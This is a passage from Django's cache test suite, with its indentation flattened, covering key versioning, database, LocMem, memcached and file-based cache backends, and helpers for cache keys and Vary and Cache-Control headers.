self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1']), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2']), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3']), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertEqual(cache.get_many(['ford4', 'arthur4']), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpicklable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
# Shouldn't fail silently if trying to cache an unpicklable type.
with self.assertRaises(pickle.PickleError):
cache.add('unpicklable', Unpicklable())
def test_set_fail_on_pickleerror(self):
with self.assertRaises(pickle.PickleError):
cache.set('unpicklable', Unpicklable())
def test_get_or_set(self):
self.assertIsNone(cache.get('projector'))
self.assertEqual(cache.get_or_set('projector', 42), 42)
self.assertEqual(cache.get('projector'), 42)
self.assertEqual(cache.get_or_set('null', None), None)
def test_get_or_set_callable(self):
def my_callable():
return 'value'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'value')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'value')
def test_get_or_set_callable_returning_none(self):
self.assertIsNone(cache.get_or_set('mykey', lambda: None))
# Previous get_or_set() doesn't store None in the cache.
self.assertEqual(cache.get('mykey', 'default'), 'default')
def test_get_or_set_version(self):
msg = "get_or_set() missing 1 required positional argument: 'default'"
cache.get_or_set('brian', 1979, version=2)
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian')
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian', version=1)
self.assertIsNone(cache.get('brian', version=1))
self.assertEqual(cache.get_or_set('brian', 42, version=1), 42)
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
self.assertIsNone(cache.get('brian', version=3))
def test_get_or_set_racing(self):
with mock.patch('%s.%s' % (settings.CACHES['default']['BACKEND'], 'add')) as cache_add:
# Simulate cache.add() failing to add a value. In that case, the
# default value should be returned.
cache_add.return_value = False
self.assertEqual(cache.get_or_set('key', 'default'), 'default')
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
# The super call needs to happen first for the settings override.
super().setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super().tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_get_many_num_queries(self):
cache.set_many({'a': 1, 'b': 2})
cache.set('expired', 'expired', 0.01)
with self.assertNumQueries(1):
self.assertEqual(cache.get_many(['a', 'b']), {'a': 1, 'b': 2})
time.sleep(0.02)
with self.assertNumQueries(2):
self.assertEqual(cache.get_many(['a', 'b', 'expired']), {'a': 1, 'b': 2})
def test_delete_many_num_queries(self):
cache.set_many({'a': 1, 'b': 2, 'c': 3})
with self.assertNumQueries(1):
cache.delete_many(['a', 'b', 'c'])
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
out = io.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Use another table name to avoid the 'table already exists' message.
LOCATION='createcachetable_dry_run_mode'
))
def test_createcachetable_dry_run_mode(self):
out = io.StringIO()
management.call_command('createcachetable', dry_run=True, stdout=out)
output = out.getvalue()
self.assertTrue(output.startswith("CREATE TABLE"))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = io.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' created.\n")
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter:
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def allow_migrate(self, db, app_label, **hints):
if app_label == 'django_cache':
return db == 'other'
return None
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
databases = {'default', 'other'}
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable', database='default', verbosity=0)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable', database='other', verbosity=0)
class PicklingSideEffect:
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
self.locked = self.cache._lock.locked()
return {}
limit_locmem_entries = override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
OPTIONS={'MAX_ENTRIES': 9},
))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super().setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
cache.add('add', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
@limit_locmem_entries
def test_lru_get(self):
"""get() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key)
cache.set(9, 9, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key)
for key in range(6, 9):
self.assertIsNone(cache.get(key))
self.assertEqual(cache.get(9), 9)
@limit_locmem_entries
def test_lru_set(self):
"""set() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(3, 9):
cache.set(key, key, timeout=None)
cache.set(9, 9, timeout=None)
for key in range(3, 10):
self.assertEqual(cache.get(key), key)
for key in range(3):
self.assertIsNone(cache.get(key))
@limit_locmem_entries
def test_lru_incr(self):
"""incr() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(6):
cache.incr(key)
cache.set(9, 9, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key + 1)
for key in range(6, 9):
self.assertIsNone(cache.get(key))
self.assertEqual(cache.get(9), 9)
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
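# For example (hypothetical host/port, not taken from this file), the test
# settings might include an entry like:
#     CACHES = {
#         'default': {
#             'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
#             'LOCATION': '127.0.0.1:11211',
#         },
#     }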
configured_caches = {}
for _cache_params in settings.CACHES.values():
configured_caches[_cache_params['BACKEND']] = _cache_params
MemcachedCache_params = configured_caches.get('django.core.cache.backends.memcached.MemcachedCache')
PyLibMCCache_params = configured_caches.get('django.core.cache.backends.memcached.PyLibMCCache')
# The memcached backends don't support cull-related options like `MAX_ENTRIES`.
memcached_excluded_caches = {'cull', 'zero_cull'}
class BaseMemcachedTests(BaseCacheTests):
# By default it's assumed that the client doesn't clean up connections
# properly, in which case the backend must do so after each request.
should_disconnect_on_close = True
def test_location_multiple_servers(self):
locations = [
['server1.tld', 'server2:11211'],
'server1.tld;server2:11211',
'server1.tld,server2:11211',
]
for location in locations:
with self.subTest(location=location):
params = {'BACKEND': self.base_params['BACKEND'], 'LOCATION': location}
with self.settings(CACHES={'default': params}):
self.assertEqual(cache._servers, ['server1.tld', 'server2:11211'])
def test_invalid_key_characters(self):
"""
On memcached, we don't introduce a duplicate key validation
step (for speed reasons); we just let the memcached API
library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
# when using the ascii protocol.
with self.assertRaises(Exception):
cache.set('key with spaces', 'value')
def test_invalid_key_length(self):
# memcached limits key length to 250
with self.assertRaises(Exception):
cache.set('a' * 251, 'value')
def test_default_never_expiring_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
TIMEOUT=None)):
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
def test_default_far_future_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
# 60*60*24*365, 1 year
TIMEOUT=31536000)):
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_memcached_deletes_key_on_failed_set(self):
# By default memcached allows objects up to 1MB. For the cache_db session
# backend to always use the current session, memcached needs to delete
# the old key if it fails to set.
# pylibmc doesn't seem to have SERVER_MAX_VALUE_LENGTH as far as I can
# tell from a quick check of its source code. This is falling back to
# the default value exposed by python-memcached on my system.
max_value_length = getattr(cache._lib, 'SERVER_MAX_VALUE_LENGTH', 1048576)
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
try:
cache.set('small_value', large_value)
except Exception:
# Some clients (e.g. pylibmc) raise when the value is too large,
# while others (e.g. python-memcached) intentionally return True
# indicating success. This test is primarily checking that the key
# was deleted, so the return/exception behavior for the set()
# itself is not important.
pass
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
def test_close(self):
# For clients that don't manage their connections properly, the
# connection is closed when the request is complete.
signals.request_finished.disconnect(close_old_connections)
try:
with mock.patch.object(cache._lib.Client, 'disconnect_all', autospec=True) as mock_disconnect:
signals.request_finished.send(self.__class__)
self.assertIs(mock_disconnect.called, self.should_disconnect_on_close)
finally:
signals.request_finished.connect(close_old_connections)
def test_set_many_returns_failing_keys(self):
def fail_set_multi(mapping, *args, **kwargs):
return mapping.keys()
with mock.patch('%s.Client.set_multi' % self.client_library_name, side_effect=fail_set_multi):
failing_keys = cache.set_many({'key': 'value'})
self.assertEqual(failing_keys, ['key'])
@unittest.skipUnless(MemcachedCache_params, "MemcachedCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
))
class MemcachedCacheTests(BaseMemcachedTests, TestCase):
base_params = MemcachedCache_params
client_library_name = 'memcache'
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key in settings.CACHES:
with self.subTest(cache_key=cache_key):
self.assertEqual(caches[cache_key]._cache.pickleProtocol, pickle.HIGHEST_PROTOCOL)
@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
OPTIONS={'server_max_value_length': 9999},
))
def test_memcached_options(self):
self.assertEqual(cache._cache.server_max_value_length, 9999)
@unittest.skipUnless(PyLibMCCache_params, "PyLibMCCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
))
class PyLibMCCacheTests(BaseMemcachedTests, TestCase):
base_params = PyLibMCCache_params
client_library_name = 'pylibmc'
# libmemcached manages its own connections.
should_disconnect_on_close = False
# By default, pylibmc/libmemcached don't verify keys client-side and so
# this test triggers a server-side bug that causes later tests to fail
# (#19914). The `verify_keys` behavior option could be set to True (which
# would avoid triggering the server-side bug), however this test would
# still fail due to https://github.com/lericson/pylibmc/issues/219.
@unittest.skip("triggers a memcached-server bug, causing subsequent tests to fail")
def test_invalid_key_characters(self):
pass
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
OPTIONS={
'binary': True,
'behaviors': {'tcp_nodelay': True},
},
))
def test_pylibmc_options(self):
self.assertTrue(cache._cache.binary)
self.assertEqual(cache._cache.behaviors['tcp_nodelay'], int(True))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super().setUp()
self.dirname = tempfile.mkdtemp()
# Caches location cannot be modified through override_settings / modify_settings,
# hence settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super().tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
self.assertTrue(os.path.exists(self.dirname))
def test_get_ignores_enoent(self):
cache.set('foo', 'bar')
os.unlink(cache._key_to_file('foo'))
# Returns the default instead of erroring.
self.assertEqual(cache.get('foo', 'baz'), 'baz')
def test_get_does_not_ignore_non_filenotfound_exceptions(self):
with mock.patch('builtins.open', side_effect=IOError):
with self.assertRaises(IOError):
cache.get('foo')
def test_empty_cache_file_considered_expired(self):
cache_file = cache._key_to_file('foo')
with open(cache_file, 'wb') as fh:
fh.write(b'')
with open(cache_file, 'rb') as fh:
self.assertIs(cache._is_expired(fh), True)
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(SimpleTestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class CacheClosingTests(SimpleTestCase):
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(SimpleTestCase):
"""
Caches configured with TIMEOUT=None create caches that set non-expiring keys.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
del self.DEFAULT_TIMEOUT
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined in
django.core.cache.backends.base.BaseCache.__init__().
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
default settings with have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
ALLOWED_HOSTS=['.example.com'],
)
class CacheUtils(SimpleTestCase):
"""TestCase for django.utils.cache functions."""
host = 'www.example.com'
path = '/cache/test/'
factory = RequestFactory(HTTP_HOST=host)
def tearDown(self):
cache.clear()
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# A specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
('', {'private': True}, {'private'}),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
with self.subTest(initial_cc=initial_cc, newheaders=newheaders):
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(SimpleTestCase):
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
